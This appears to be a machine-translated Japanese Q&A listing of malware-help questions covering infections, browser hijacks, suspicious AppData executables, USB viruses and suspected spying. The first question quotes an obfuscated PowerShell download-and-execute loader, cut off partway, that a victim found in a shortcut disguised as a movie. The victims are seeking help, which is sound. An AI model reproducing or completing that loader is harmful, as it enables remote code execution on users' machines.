タグ付けされた質問 「malware」

私は映画であるべきファイルを手に入れましたが、powershellコマンドを実行するためのショートカットであることが判明しました。詳細は次のとおりです。 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%. このpowershellコマンドが何をするのか、どこでデコードする方法の詳細を見つけることができるのか誰かにアドバイスできますか？ ありがとう

powershell  malware 

最近、私のインターネットは劇的に遅くなりました。VistaコンピューターからのTCP / IP接続を確認するツールをダウンロードしました。SVCHostを介して212.192.255.240への多くのTCP / IP接続が行われていることがわかりました。別のポートに接続しようとしているようです。 私のコンピューターはある種のマルウェアに感染していると思いますが、どうやってそれを取り除くのかわかりません。このIPについて少し調査しましたが、何も見つかりませんでした。 どんな提案も大歓迎です。 更新： これはHiJackThisログファイルです-奇妙なものは見つかりません。このプログラムは、ロシアにある91.205.127.63への接続も作成しようとしていることがわかりました。 Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 18:20:54 PM, on 4/29/2010 Platform: Windows Vista SP2 (WinNT 6.00.1906) MSIE: Internet Explorer v8.00 (8.00.6001.18882) Boot mode: Normal Running processes: C:\Windows\SYSTEM32\taskeng.exe C:\Windows\system32\Dwm.exe C:\Windows\SYSTEM32\Taskmgr.exe C:\Windows\explorer.exe C:\Windows\System32\igfxpers.exe C:\Program Files\Alwil Software\Avast4\ashDisp.exe C:\Program Files\Software602\Print2PDF\Print2PDF.exe C:\Windows\system32\igfxsrvc.exe C:\Program …

tcpip  malware  connection 

ボットネットクライアントはどのようにしてユーザーのユーザー名とパスワードにアクセスしますか？ これらの詳細とユーザーのIPアドレスをCnCサーバーに送信する必要があると思います。 ある種のフィッシング方法を使用していますか、または機密データへのアクセスが予想よりも簡単ですか？

windows  malware 

数日間、次の症状が発生します。 アドレスバーに検索語を入力するたびに、すべてのブラウザで設定されている通常のGoogleではなく、「secure-surf.net」という名前の検索エンジンにリダイレクトされることがあります。 これは、クロム、Firefoxで発生します。 実際には、Googleが最初に開かれ、次に何か他のsecure-surf.netエンジンがリダイレクトされます。 通常のGoogle検索が行われる場合でも、結果は変更されています。いくつかの偽の無関係な結果が最初のいくつかの結果として追加されています。繰り返しになりますが、定期的に真の関連する結果が表示されます。そして、私の目の前で、ページに偽の結果が追加されることはほとんどありません。これは、実際のGoogle検索で発生します。 私が取ったステップ： フルシステムスキャン：avastアンチウイルス（更新されたdb）、malwarebytes、zemanaアンチマルウェア。いずれにも問題は見つかりませんでした。 Chromeで不明な拡張機能を確認しました。私が知らない、または信頼できないものは見つかりませんでした。どちらも新しいものではありません シークレットウィンドウから検索しようとしました。上記の現象＃2は、同様に発生します。 スタート→コントロールパネル→ネットワークとインターネット→インターネットオプション→接続→LAN設定-プロキシセットは表示されません 状況をデバッグするのを手伝ってください、さらなるステップを提案してください。

google-chrome  firefox  malware 

定期的なPCクリーニング中に、MBAM Pro、Windows Defender、およびSpybot S＆Dによって見落とされていた可能性のあるいくつかのことに気付きました（もちろんすべて最新です）。私はコンピューターや他のコンピューター（15年のコンピューターの経験があります）でそれらを見たことがなく、少し心配です。 私はいくつかのGoogle検索を実行しましたが、役に立ちませんでした。私のGoogleFuは現時点では弱いかもしれません。 どうぞ： dehxp.exe Adobe148.exe＆6moxz.exe（として表示New Tec） Adobe852.exe＆5f5wt.exe（として表示New Tec） Adobe512.exe（として表示Thunderbird） WindowsMediaPlayer.exe＆uem7r.exe（として表示Setup Installer） これらのファイルはすべて、私のマシン上にある%APPDATA%ディレクトリにありC:\Users\[username]\AppData\Roamingます。 実際のexeファイルを表示するには、Hide protected operating system files (Recommended)下のオプションをオフView > [Folder] Options > View [tab] > Advanced settingsにする必要がありました。 また、スキャン後に必要な再起動の前にそれらをすべて無効にして、dehxp.exe再度有効にしました。 さらに、dehxp.exeのドロップダウンでは、プロパティの取得またはのファイルの場所の表示のみができdehxp.exe、両方のExplorerエントリがSearch online有効になっています。 Windows 8 Pro x64（legit）を最新のアップデートで実行しています。また、私はこのコンピューターにMozilla Thunderbirdをインストールしたことがないため、特にそうではないので、このリストに含めていthunderbird.exeます。 最後に、箇条書きリストでは、item1＆の形式のitem2ファイルはいずれもファイルサイズが同じであり、互いに数分（通常は1分）以内に作成されました。 誰もこれらのいずれかを見たことがありますか？心配する必要がありますか？ ありがとう！ 編集と更新： ユーザーAaron MillerはComboFixの使用を提案しました。ただし、この記事の執筆時点では、互換モードを有効にしてインストールしようとしても、Windows 8との互換性はありません。

windows-8  virus  malware 

マイクロソフトのWebサイトから悪意のあるソフトウェアの削除ツールをダウンロードし、2017年11月版を入手しました。これは明らかに最新版です。クイック分析中に、ツールは見つかった数百の感染ファイルをレポートし、最後に、スキャンが終了すると、何も見つからなかったと報告します。それはソフトウェアのバグですか、それともツールが正確に何を教えようとしているのですか？スクリーンショットをいくつか追加しました（これは私のシステムロケールであるため、残念ながらドイツ語のみです）。しかし、私はすべてのシステムでその動作を再現できます。 ツールはこちらからダウンロードできます：https : //www.microsoft.com/de-de/download/malicious-software-removal-tool-details.aspx

windows  security  virus  malware  anti-virus 

ウイルスにより、USBフラッシュドライブ上のすべてのフォルダーと一部のファイルが.exeファイルに変更されました。USBディスクセキュリティでフラッシュドライブをスキャンし、Microsoft Security Essentialsでコンピューターをスキャンし、検出されたマルウェアをすべて削除しましたが、フラッシュドライブ上のファイルとフォルダーは.exeファイルとして表示されたままです。私に何ができる？重要なデータが含まれているため、フラッシュドライブをフォーマットできません。

usb-flash-drive  data-recovery  virus  malware  file-extension 

Malwarebytesを使用していますが、最近chrome.exe、呼び出されたサイトへの接続の試みcatbox.moeがブロックされたことが1回または2回ポップアップされました。 簡単なグーグル検索でここに導かれます：https : //forums.malwarebytes.com/topic/198384-filescatboxmoe-66150188176/ そして、過去のある時点でサイトがマルウェアに感染したようです。 しかし、私の懸念は、クロムのどの部分がこれを行っているのですか？拡張機能ですか？バックグラウンドでそれをロードする私が訪れたいくつかのページ？ おそらくページである可能性が高いですが、拡張機能の1つがそれを実行している可能性がある場合は、見つけたいと思います。自分の知らないうちに、スクリーンショットを頻繁にアップロードする拡張機能を追加した場合 どうすればわかりますか？

google-chrome  google-chrome-extensions  malware 

MacbookでEl Capitanを実行しています。Download.comからいくつかのソフトウェアをダウンロードした後、ガベージ（ebay検索バーなど）がインストールされました。追加したダウンロードはすべて削除しましたが、Webブラウザーの読み込みが遅く、信頼性が低いことに気付きました。ステータスバーに奇妙なアドレスが表示されることにも気付きました。ほとんどは通常のURLですが、特にGoogleで情報が見つかりません。URLには「scontent-ord1-1」が含まれます。これは何ですか？

macos  google-chrome  html  malware 

この質問にはすでに答えがあります： 悪意のあるスパイウェア、マルウェア、アドウェア、ウイルス、トロイの木馬、またはルートキットをPCから削除するにはどうすればよいですか？ 19答え 昨日、私の弟のコンピューターはほぼすべてのサイトに広告を表示していました。右下隅に同じ広告が黒い閉じるボタンで表示されていました。今日、私のコンピューターはそれらを見せ始めました。私は彼と同じネットワークを使用しますが、ネットワーク感染のリスクを最小限にするためにパブリックネットワークとして使用します。問題は、疑わしいソースからソフトウェアをインストールしないことです。誰もこのウイルスについて何か知っていますか？それらの広告を含む合法的なサイトのスクリーンショットがいくつかあります。したがって、私のコンピューターは感染しており、疑わしいChrome拡張機能やアドオンはありません。助言がありますか？ありがとう。

-1 google-chrome  virus  malware  advertisements 

昨夜、Windows 8.1ラップトップにmidiファイルをダウンロードしました。それ以来、Chromeを開くたびに、アクセスしようとするすべてのサイトで標準の「Webページが利用できません」というエラーが表示されます。 FirefoxとInternet Explorerもどのページも開きません。以前にも同様の感染症があったので、マルウェアが原因であると確信しています。 セーフモードと通常モードの両方で（最新の署名を使用して）次のツールを使用してスキャンを実行しました 1）Malwarebytes Antimalware 2）Spybot 3）Microsoft Anti-Malwareツール ウイルスのMcAfeeスキャンも実行しました。驚くべきことに、すべてのマルウェア削除ツールとMcAfeeは、1つのオブジェクトでさえ検出できませんでした！ 前回、マルウェア削除ツール（オブジェクトを検出して削除）を使用して問題を解決したため、非常に驚​​きました。 ただし、Googleで何時間も費やした後、cmdでipconfig / flushdnsコマンドを実行すると問題を解決できることがわかりました。試したところ、問題は一時的に解決されました。ただし、Chromeを閉じて再起動した場合、またはChromeをしばらくアイドル状態のままにした場合、問題は再び発生します。 ノー休息と、次のCMDのコマンドを使用してのWinsockとIPをリセットしようとしている- のnetsh Winsockがリセットされ ます。netsh winsockのリセットカタログ netshをint型のIPv4リセットreset.log reset.log netshをint型のIPv6リセット netshをint型のIPリセットはc：\ resetlog.txtを Avira DNS Repair Toolも実行しました。しかし、DNS設定がDNS変更マルウェアによって変更されていないため、修復の必要はないと述べました。 インターネットを使用することができないので、できるだけ早く良いソリューションをいただければ幸いです。 注 -1）WiFiを使用してモデムに接続します。後でLANワイヤーを使用して接続しようとしましたが、違いはありませんでした。 2）両方のモードを介して接続している間、接続の問題はありません。 前もって感謝します！ 編集 これは、google.comへの私のトレースルートです。

-1 networking  wireless-networking  google-chrome  dns  malware 

私のフラッシュメモリにはマルウェアがあります。ノートパソコンに接続した後、隠しファイルを見ることができなくなりました。これらの方法を試してみましたが、フォルダとラジオボタンのオプションを「隠しファイルを表示しない」から「隠しファイルを表示する」に変更できません。 1）regedit.exe - ＆gt; HEY_LOCAL_MASHIN \ソフトウェア\ MICROSOFT \ WINDOWS \ CurrentVersion \ Explorer \詳細\フォルダ\隠し\ SHOWALL。 CheckedValue = 0x1を設定します。 2）〜。 DefaultValue = 0x2に設定します。 シモンズ：Windows 7のサービスパック1は私のラップトップにインストールされています。

-2 windows-7  windows-registry  malware 

フラッシュ上にある次のコンテンツのファイルを見つけました。 ファイル どのコーディングを使用していますか？ デコードする方法は？

-5 windows  shell  powershell  malware 

似たような質問がいくつかありますが、私がやろうとしているスパイ行為のすべての可能性を包括的に扱っているものはありません。 私の配偶者は、おそらくIT専門家の助けを借りて、主に私のインターネットの使用状況（はい、明らかにシークレットモード）をスパイする方法を用意していると確信しています。私は自分の配偶者が承認しないだろうとわかっていることをテストすることで疑念を抱き、彼らは何も言っていないが強い反応に気づいた。私はこれを完全に調査しようとしており、これを検出するためにどのようにこれを行うことができるかについてさまざまな方法を検討しています。私が外出したときに彼らは私の家、ルーター、デバイスに完全に物理的にアクセスでき、ラップトップとタブレットの管理者アカウントはパスワードで保護されておらず、ネットワークとルーターのパスワードは彼らに知られています。Windows 7とAndroid、Chromeを使用していますが、ネットワークはワイヤレスです。 角括弧は各オプションを検討するために行ったもので、すべてのオプションを除外していると思います。 ルーターオプション 1）ルーターのDNS IPアドレスを、ルーターを経由するすべてのトラフィックをログに記録するOpenDNSなどのサービスに変更する[チェックし、DNS IPアドレスを[ISPから取得]に設定]。 2）ルーターのトラフィックログを頻繁に確認する[トラフィックのログを保持していないように見えるee brightboxルーターがあります。ルーターページで見つけることができる唯一のログは、「システムログ-このページには、管理者のログイン/ログアウト、ブロードバンド接続ステータスなどのさまざまなシステムイベントが表示されます」です。これは、2013年からこのフォーラムの一部のユーザーによって確認されましたhttp://forums.thinkbroadband.com/freeserve/4240433-view-send-logs-from-ee-brightbox.html ] 3）別のルーター（ルーター2）を家のどこかに置き、そのワイヤレスネットワーク名を古いルーター（ルーター1）に似せて、ルーター2に自動接続するようにデバイスを設定し、上記の方法のいずれかを使用する-craftな[接続しているネットワーク名をルーター1の名前と比較しましたが、同じ名前で、同様の名前を持つネットワークは他にありません。また、ルーター1の[ステータス]ページには、デバイスが接続されていることが表示されます] 4）ルーターとマイクロフィルターの間にいくつかのハードウェアをインストールしますか？または電話ソケット？（可能性があるかどうかはわかりません）[何もありません。電話ソケットを開くか、ルーターを開いて内部にはんだ付けされているかどうかを確認するのをやめました...] デバイスオプション 5）ラップトップにキーロガーをインストールする[Keylogger Detectorを使用、http： //download.cnet.com/Keylogger-Detector/3000-2162_4-75744701.html- 何も見つかりませんでした。MS Security Essentialsもマルウェアバイトも無料（試用期限切れ）でも、これらがキーロガーを検出するはずだとは思わなかったでしょう。 6）訪問したWebサイトを記録するラップトップおよびAndroidタブレットに他のソフトウェアをインストールします。ソフトウェアの実行やメディアの再生も可能です。オンラインでdsniffのようなスニファーに関するものを見ましたが、それらが関連していると思われるものは明確ではありません。[タスクバーの通知領域、タスクマネージャー、Windowsファイアウォールなどには明らかなものはありません。MS Security Essentialsの広告マルウェアバイト無料（試用期限切れ）では何も見つかりませんでした。 7）画面や音声のビデオキャプチャを保存/送信するラップトップやAndroidタブレットに他のソフトウェアをインストールする[上記のように、そうは思わない。6] 8）1）と同様ですが、ルーターオプションの代わりにデバイスオプションを使用して、DNSアドレスをOpenDNSなどに変更します。詳細は、https：//www.opendns.com/setupguide/#familyshield [nope、set to "両方のデバイスで自動的に取得する] 別のオプション 9）ラップトップと一緒に座っている場所を見下ろすスパイカメラを設置する（常に同じ場所）[何も見つからない]。 質問、最後に これについて心配することにうんざりしているので、誰かが私が考えていなかった他のオプションをチェックする方法で指摘できるなら、最も感謝しています。または、私が考えていたオプションのいずれかを除外する私の方法が十分ではない場合。 明らかに、私が考えているこのIT会社は、このことについて私よりも多くのことを知っており、おそらくほとんどのユーザーには検出できない何かをすることができます。彼らはこの種のことを専門としています。しかし、このタイプのことは本当に間違っているようですので、それに対する保護手段が必要です...

-6 networking  router  security  malware  spyware